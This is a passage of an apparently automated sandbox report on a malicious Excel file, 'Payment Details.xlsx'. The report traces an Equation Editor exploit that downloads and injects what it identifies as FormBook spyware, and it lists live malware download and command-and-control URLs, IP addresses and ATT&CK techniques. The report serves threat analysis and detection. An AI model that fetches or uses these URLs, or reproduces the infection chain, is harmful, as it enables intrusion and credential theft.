          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 0000000A.00000000.549499857.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491344404.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.483588339.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing13/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528790 Sample: Payment Details.xlsx Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Found malware configuration 2->61 63 21 other signatures 2->63 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 29 2->15         started        process3 dnsIp4 47 202.55.132.154, 49165, 80 ADTEC-AS-VNADTECMediaJointStockCompanyVN Viet Nam 10->47 41 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->41 dropped 43 C:\Users\Public\vbc.exe, PE32 10->43 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->81 17 vbc.exe 3 10->17         started        45 C:\Users\user\...\~$Payment Details.xlsx, data 15->45 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\...\OmnbtuhFsJys.exe, PE32 17->37 dropped 39 C:\Users\user\AppData\Local\...\tmpC92A.tmp, XML 17->39 dropped 65 Multi AV Scanner detection for dropped file 17->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 17->67 69 Adds a directory exclusion to Windows Defender 17->69 71 2 other signatures 17->71 21 vbc.exe 17->21         started        24 powershell.exe 6 17->24         started        26 schtasks.exe 17->26         started        signatures9 process10 signatures11 73 Modifies the context of a thread in another process (thread injection) 21->73 75 Maps a DLL or memory area into another process 21->75 77 Sample uses process hollowing technique 21->77 79 Queues an APC in another process (thread injection) 21->79 28 explorer.exe 21->28 injected process12 dnsIp13 49 www.metafirstclass.com 52.128.23.153, 49167, 80 DOSARRESTUS United States 28->49 83 System process connects to network (likely due to code injection or exploit) 28->83 32 rundll32.exe 28->32         started        signatures14 process15 signatures16 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment Details.xlsx36%VirustotalBrowse
          Payment Details.xlsx33%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe50%ReversingLabsByteCode-MSIL.Spyware.Noon
          C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe50%ReversingLabsByteCode-MSIL.Spyware.Noon
          C:\Users\Public\vbc.exe50%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.vbc.exe.706380.3.unpack100%AviraTR/ATRAPS.GenDownload File
          9.2.vbc.exe.30000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          9.0.vbc.exe.400000.10.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.vbc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.vbc.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://202.55.132.154/384500000_1/vbc.exe13%VirustotalBrowse
          http://202.55.132.154/384500000_1/vbc.exe100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          www.blancheshelley.xyz/g2fg/9%VirustotalBrowse
          www.blancheshelley.xyz/g2fg/100%Avira URL Cloudphishing
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.metafirstclass.com
          52.128.23.153
          truetrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.metafirstclass.com/g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6xtrue
            • Avira URL Cloud: safe
            unknown
            http://202.55.132.154/384500000_1/vbc.exetrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            www.blancheshelley.xyz/g2fg/true
            • 9%, Virustotal, Browse
            • Avira URL Cloud: phishing
            low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpfalse
              high
              http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                high
                http://java.sun.comexplorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpfalse
                • URL Reputation: safe
                unknown
                http://investor.msn.comexplorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                    high
                    http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpfalse
                      high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpfalse
                        high
                        http://investor.msn.com/explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpfalse
                            high
                            http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://www.%s.comPAvbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            low
                            http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpfalse
                              high
                              https://support.mozilla.orgexplorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpfalse
                                high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpfalse
                                  high
                                  http://treyresearch.netexplorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpfalse
                                    high
                                    http://servername/isapibackend.dllschtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    52.128.23.153
                                    www.metafirstclass.comUnited States
                                    19324DOSARRESTUStrue
                                    202.55.132.154
                                    unknownViet Nam
                                    45540ADTEC-AS-VNADTECMediaJointStockCompanyVNtrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:528790
                                    Start date:25.11.2021
                                    Start time:19:28:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Payment Details.xlsx
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLSX@13/26@1/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 33.4% (good quality ratio 31%)
                                    • Quality average: 78.7%
                                    • Quality standard deviation: 29.4%
                                    HCA Information:
                                    • Successful, ratio: 89%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xlsx
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    19:28:37API Interceptor96x Sleep call for process: EQNEDT32.EXE modified
                                    19:28:41API Interceptor82x Sleep call for process: vbc.exe modified
                                    19:28:44API Interceptor10x Sleep call for process: powershell.exe modified
                                    19:28:45API Interceptor1x Sleep call for process: schtasks.exe modified
                                    19:29:06API Interceptor229x Sleep call for process: rundll32.exe modified
                                    19:30:10API Interceptor1x Sleep call for process: explorer.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    52.128.23.153ScanPIX.exeGet hashmaliciousBrowse
                                    • www.teslabotnews.com/b3n1/?6lP=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6DJWZpG9FVC6&3f0pfr=Kl08lv
                                    Sales Agreement 17-11-21.docGet hashmaliciousBrowse
                                    • www.primetimeexpress.com/unzn/?y484Hx=-ZBHbB&ADH05pfH=MJyeuj/2LKgxhmwBEaOepQoT7p7qWMZxszA12ONlFtrFds1veJHUTtJAiK7RWXKTq53B3g==
                                    WvXgppXywm.exeGet hashmaliciousBrowse
                                    • www.toylandmetaverse.com/fl9w/?5j=v1AeKWlaHX6Eq72DF41G94UNV/NYDSuRplsWHrwN6To9EelRczKlltUWTrACum/yoB9ljSCjWA==&h8U4C=6llpd2Bh-
                                    Payment Copy.exeGet hashmaliciousBrowse
                                    • www.teslabotnews.com/b3n1/?yT64XD=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6Al/ap6FM23sDVnWfA==&3fHX7=FRihe
                                    PaymentCopy.exeGet hashmaliciousBrowse
                                    • www.teslabotnews.com/b3n1/?3f2xVxJp=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6ApGWIWFbwr9&5jwDp=L6AxwpFhVl
                                    Order 2021-822.lzhGet hashmaliciousBrowse
                                    • www.facebookfrommeta.com/eg62/?bZ8x3p=OV0lMEyKFd8jUreu4bi0Rr4kVRCFjgRe9oHLF6Mu/RQip7pQWlFSy5baU8mChkjx4bva&9rmL=2dTD-rk0Sn
                                    Enquiry docs_001.xlsxGet hashmaliciousBrowse
                                    • www.seattleinsurancebrokers.com/ga6b/?5j=A0D4KLkh&f6AtFb8=oGgLDSe9xOlB5GlDtwDzpX4pln6O05SLUMzRMDF+wYBaw1FiV59KxrRNiVTogSR6a0FYWg==
                                    Ekol_LOG_00914,pdf.exeGet hashmaliciousBrowse
                                    • www.crushanxiety.com/dgt9/?bH=DN9ti628iJ60&j4=12y/kml0JY96G501vbo19U/0atRochhfLWLJv6r29D8zD012Da+Wo+tthAajWN1QtyKepmajXA==
                                    n14Gz5Qjcb.exeGet hashmaliciousBrowse
                                    • www.seniordatingtv.com/m0np/?j6782P=EZM4Hn6&9rjPn6YP=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOHojoIO06SWV
                                    Order778.exeGet hashmaliciousBrowse
                                    • www.thatswhatshesays.com/qtqq/?Blm8j=f/FZiUyvdsuqwIBAgZIX9WKLQRzMOkEyandyJXo4F5lwu5RDUoyQAcRbAjtv9ea26I2c&d2J41F=NR-H4
                                    RgproFrlyA.exeGet hashmaliciousBrowse
                                    • www.seniordatingtv.com/m0np/?UxlT9j=6lJxR8&ibh=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOEIznpeMk3/S
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • www.shanghaiinvestments.com/dbew/?0B=ZHEP+6Sbwud2o6WPXQGcD07+3wwAURWE880vqsTElQTjXjhbwYnDXrL09FYjjtKpss2J&F2Jl=pVbXcXHhznF
                                    ocJJiP3R3A.exeGet hashmaliciousBrowse
                                    • www.seniordatingtv.com/m0np/?1bvd-4=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOEIZ4ZuMg13S&u0Dh=E2MDa2W
                                    GvrY83cA2d.exeGet hashmaliciousBrowse
                                    • www.inteleflow.com/bckt/?4hJDF=fxU5WiEsw2pXQ8uTQlBJiUCTUYmTeFKNjZblV7MbpGmpAyjjGOXWfttsCZUwbu6D8RjV&w48lT8=6loHNvhx9TdHUd0
                                    Quotation...exeGet hashmaliciousBrowse
                                    • www.safbox.com/qb4a/?s2MPPpM=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1qLWWV1UPmz7&iF=7n3dzFOPzb6dZjL
                                    purchase order_8019.exeGet hashmaliciousBrowse
                                    • www.safbox.com/qb4a/?TL3D=FrgLUJvHzHA4&V48DtRqP=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1prGZ0lsRDa8
                                    PURCHASE ORDER...exeGet hashmaliciousBrowse
                                    • www.safbox.com/qb4a/?kZAtl=3fNTnDv&Y2J=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1qL8JlFULk77
                                    CTM_50,000.exeGet hashmaliciousBrowse
                                    • www.buyspygear.com/eca0/?fL08q=zY4pfOeDeO/4cMsab5ROCLy9IlZvLYQaYwu3Wi3iIrICY2pboEoqtMc4wIaZ15ginwXROy0c0Q==&m2=-ZVD
                                    gqdJ6f9axq.exeGet hashmaliciousBrowse
                                    • www.zwq.xyz/wufn/?f8TPbh=XjXBhjUXVwqHNoI6l7gvZZ0GeOD10IACqOaYHXXfcnXXr5FIeGn5Pi6ag2sKCKjwblNQsnhuYg==&mVEhB=4hPxHDz
                                    yAm5YrRQhy.exeGet hashmaliciousBrowse
                                    • www.telehood.com/ons5/?TfoP=H8HXnZyeypkxdZWjx93+goBuntysNdud/1pYfiy9imFYwHStf/ZC3J9TIxLN5tUW2H7n&8pFPh=EJBl8lT8vxY0u
                                    202.55.132.154Payment.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/4267111111_2/vbc.exe
                                    RFQ.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/76190111111_1/vbc.exe
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/2290nw/vbc.exe
                                    Quote.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/2290nw/vbc.exe
                                    Quotation123 19.11.21.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/48680c/vbc.exe
                                    Shipping Document.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/x386w/vbc.exe
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/66w880/vbc.exe
                                    RFQ - R000001095.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/w7h009/vbc.exe
                                    Quotation.xlsxGet hashmaliciousBrowse
                                    • 202.55.132.154/explorer10/vbc.exe

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    DOSARRESTUSScanPIX.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Sales Agreement 17-11-21.docGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    WvXgppXywm.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Payment Copy.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    PaymentCopy.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Order 2021-822.lzhGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Enquiry docs_001.xlsxGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Ekol_LOG_00914,pdf.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    n14Gz5Qjcb.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Order778.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    RgproFrlyA.exeGet hashmaliciousBrowse
                                    • 52.128.23.153
                                    Purchase Order.exeGet hashmaliciousBrowse
